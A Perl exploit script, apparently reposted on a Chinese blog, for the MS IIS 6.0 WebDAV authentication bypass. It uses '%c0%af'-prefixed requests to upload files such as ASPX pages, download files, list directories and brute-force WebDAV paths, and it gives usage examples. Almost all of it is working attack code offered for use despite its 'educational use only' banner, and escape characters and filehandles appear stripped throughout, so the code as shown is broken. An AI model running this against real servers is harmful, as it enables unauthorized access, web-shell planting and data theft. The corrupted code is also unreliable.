#!/usr/bin/perl
# ********* !!! WARNING !!! *********
# * FOR SECURITY TESTiNG ONLY! *
# ***********************************
# MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1
# v1.1 add brute force dir fuction.
# v1.0 download?upload and list dir.
#
# Usage:
# IIS6_webdav.pl -target -port -method -webdavpath|-BruteForcePath [-file]
# -target eg.: 192.168.1.1
# -port eg.: 80
# -method eg.: g
# (p:PUT,g:GET,l:LIST)
# -webdavpath eg.: webdav
# -BruteForcePath eg.: brute force webdav path
# -file (optional) eg.: test.aspx
# Example:
# put a file:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx
# get a file:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -x webdav -f test.aspx
# list dir:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -x webdav
# brute force + list dir:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -b dirdic.txt
# brute force + get file:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -b dirdic.txt -f test.aspx
use IO::Socket;
use Getopt::Long;
use threads;
use threads::shared;
# Globals Go Here.
my $target; # Host being probed.
my $port; # Webserver port.
my $method; # HTTP Method, PUT GET or .
my $xpath; # WebDAV path on Webserver.
my $bpath; # Bruteforce WebDAV path.
my $file; # file name.
my $httpmethod;
my $Host_Header; # The Host header has to be changed
GetOptions(
"target=s" => $target,
"port=i" => $port,
"method=s" => $method,
"xpath=s" => $xpath,
"bpath=s" => $bpath,
"file=s" => $file,
"help|?" => sub {
hello();
exit(0);
}
);
$error .= "Error: You must specify a target hostn" if ((!$target));
$error .= "Error: You must specify a target portn" if ((!$port));
$error .= "Error: You must specify a put,get or list methodn" if ((!$method));
$error .= "Error: You must specify a webdav pathn" if ((!$xpath) && (!$bpath));
$error .= "Error: You must specify a upload or download file namen" if ((!$file) && $method != "l");
if ($error) {
print "Try $0 -help or -?' for more information.n$errorn" ;
exit;
}
hello();
if ($method eq "p") {
$httpmethod = "PUT";
} elsif ($method eq "g") {
$httpmethod = "GET";
} elsif ($method eq "l") {
$httpmethod = "PROPFIND";
} else {
print "$method Method not accept !!!n";
exit(0);
}
# ************************************
# * We testing WebDAV methods first *
# ************************************
webdavtest($target,$port);
#end of WebDAV testing.
# ****************************************
# * We try to brute forceing WebDAV path *
# ****************************************
if ($bpath) {
$xpath = webdavbf($target,$port,$bpath);
}
#end of brute force
print "-" x 60 ."n";
if ($httpmethod eq "PUT") {
my $content;
my $data;
#cacl file size
$filesize = -s $file;
print "$file size is $filesize bytesn";
open(INFO, $file) || die("Could not open file!");
#@lines=;
binmode(INFO); #binary
while(read(INFO, $data, $filesize))
{
$content .= $data;
}
close(INFO);
#print $content;
$Host_Header = "Translate: frnHost: $targetrnContent-Length: $filesizern";
} elsif ($httpmethod eq "GET") {
$Host_Header = "Translate: frnHost: $targetrnConnection: closernrn";
} elsif ($httpmethod eq "PROPFIND") {
$Host_Header = "Host: $targetrnConnection: closernContent-Type: text/xml; charset="utf-8"rnContent-Length: 0rnrn";
$Host_Header = $Host_Header."";
}
print "-" x 60 ."n$httpmethod $file , Please wait ...n"."-" x 60 ."n";
# ************************
# * Sending HTTP request *
# ************************
if ($httpmethod eq "PUT") {
@results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0rn$Host_Headerrn$content",$target,$port,10);
if ($#results < 1){die "10s timeout to $target on port $portn";}
} elsif ($httpmethod eq "GET") {
@results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0rn$Host_Header",$target,$port,10);
if ($#results < 1){die "10s timeout to $target on port $portn";}
} elsif ($httpmethod eq "PROPFIND") {
@results=sendraw2("$httpmethod /%c0%af$xpath/ HTTP/1.0rn$Host_Header",$target,$port,10);
if ($#results < 1){die "10s timeout to $target on port $portn";}
}
#print @results;
$flag="off";
if ($results[0] =~ m|^HTTP/1.[01] 2[0-9][0-9] |){
$flag="on";
} elsif ($results[0] =~ m|^HTTP/1.[01] 4[0-9][0-9] |){
$flag="off";
}
print "-" x 60 ."n";
if ($flag eq "on") {
if ($httpmethod eq "PUT") {
print "$httpmethod $file from [$target:$port/$xpath] OKrn";
} elsif ($httpmethod eq "GET") {
my $line_no = 0;
my $counter = @results;
foreach $line (@results){
++$line_no;
if ($line =~ /^Accept-Ranges: bytesrn/){
last;
}
}
# Write file to disk
open(OUTFILE, ">$file") or die "Could not write to file: $!n";
binmode (OUTFILE);
print OUTFILE @results[$line_no+1..$counter];
close(OUTFILE);
print "$httpmethod $file from [$target:$port/$xpath] OKrnPlease check $file on local diskrn";
} elsif ($httpmethod eq "PROPFIND") {
print "$httpmethod path list from [$target:$port/$xpath] OKrn";
foreach $line (@results){
if ($line =~ /^ my @list = split("", $line);
foreach $path (@list) {
$no = index($path,"<");
$result.=substr($path, 0, $no)."n";
}
print $result;
last;
}
}
}
} else {
print "$httpmethod $file from [$target:$port/$xpath] FAILED!!!rn";
}
print "-" x 60 ."n";
exit(0);
# *************
# * Sendraw-2 *
# *************
sub sendraw2 {
my ($pstr,$realip,$realport,$timeout)=@_;
my $target2 = inet_aton($realip);
my $flagexit=0;
$SIG{ALRM}=&ermm;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems");
alarm($timeout);
if (connect(S,pack "SnA4x8",2,$realport,$target2)){
alarm(0);
my @in;
select(S); $|=1;
print $pstr;
alarm($timeout);
while(){
if ($flagexit == 1){
close (S);
print STDOUT "Timeoutn";
return "Timeout";
}
push @in, $_;
}
alarm(0);
select(STDOUT);
close(S);
return @in;
} else {return "0";}
}
sub ermm{
$flagexit=1;
close (S);
}
sub webdavtest {
my ($testip,$testport)=@_;
print "-" x 60 ."n";
print "Testing WebDAV methods [$testip $testport]n";
print "-" x 60 ."n";
@results=sendraw2("OPTIONS / HTTP/1.0rnrn",$testip,$testport,10);
if ($#results < 1){die "10s timeout to $target on port $testportn";}
#print @results;
$flag="off";
foreach $line (@results){
if ($line =~ /^Server: /){
($left,$right)=split(/:/,$line);
$right =~ s/ //g;
print "$target : Server type is : $right";
if ($right !~ /Microsoft-IIS/i){
print "$target : Not a Microsoft IIS Servern";
exit(0);
}
}
if ($line =~ /^DAV: /){
$flag="on";
}
if ($line =~ /^Public: / && $flag eq "on"){
($left,$right)=split(/:/,$line);
$right =~ s/ //g;
print "$target : Method type is : $right";
if ($right !~ /$httpmethod/i){
print "$target : Not allow $httpmethod on this WebDAV Servern";
exit(0);
} else {
$flag="on";
}
}
}
if ($flag eq "off") {
print "$target : WebDAV disablen";
exit(0);
}
}
sub webdavbf {
my ($bfip,$bfport,$bfpath)=@_;
print "-" x 60 ."n";
print "Try to brute forceing WebDAV path ...n";
print "-" x 60 ."n";
open(BF, $bfpath) || die("Could not open file!");
foreach $lines (){
chomp($lines);
$Host_Header = "Host: $bfiprnConnection: closernContent-Type: text/xml; charset="utf-8"rnContent-Length: 0rnrn";
$Host_Header = $Host_Header."";
@results=sendraw2("PROPFIND /$lines/ HTTP/1.0rn$Host_Header",$bfip,$bfport,10);
if ($#results < 1){die "10s timeout to $bfip on port $bfportn";}
print "[$lines]...$results[0]";
#maybe this response
#HTTP/1.1 207 Multi-Status
if ($results[0] =~ m|^HTTP/1.[01] 401 |){
print "Find out path on [$lines]n";
return $lines;
last;
}
}
close(BF) ;
print "Sorry... We can not find any more path... :(n";
exit(0);
}
sub hello{
print "n";
print "t ##################################################n";
print "t # MS IIS 6.0 WebDAV Auth. Bypass Exploit V1.0 #n";
print "t # **************** !!! WARNING !!! **************#n";
print "t # **** FOR PRIVATE AND EDUCATIONAL USE ONLY! ****#n";
print "t # ***********************************************#n";
print "t # Written by csgcsg 090529 #n";
print "t ###################################################n";
print "nt $0 -target -port -method -webdavpath [-file]n";
print "nt -targettt eg.: 192.168.1.1n";
print "t -portttt eg.: 80n";
print "t -method (p:PUT, g:GET, l:LIST)t eg.: gn";
print "t -webdavpath|-bruteForcePathtt eg.: webdavn";
print "t -filettt eg.: test.aspxnn";
print "tUsage eg.: nt$0 -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspxn";
};
阅读(353) | 评论(0) | 转发(0) |
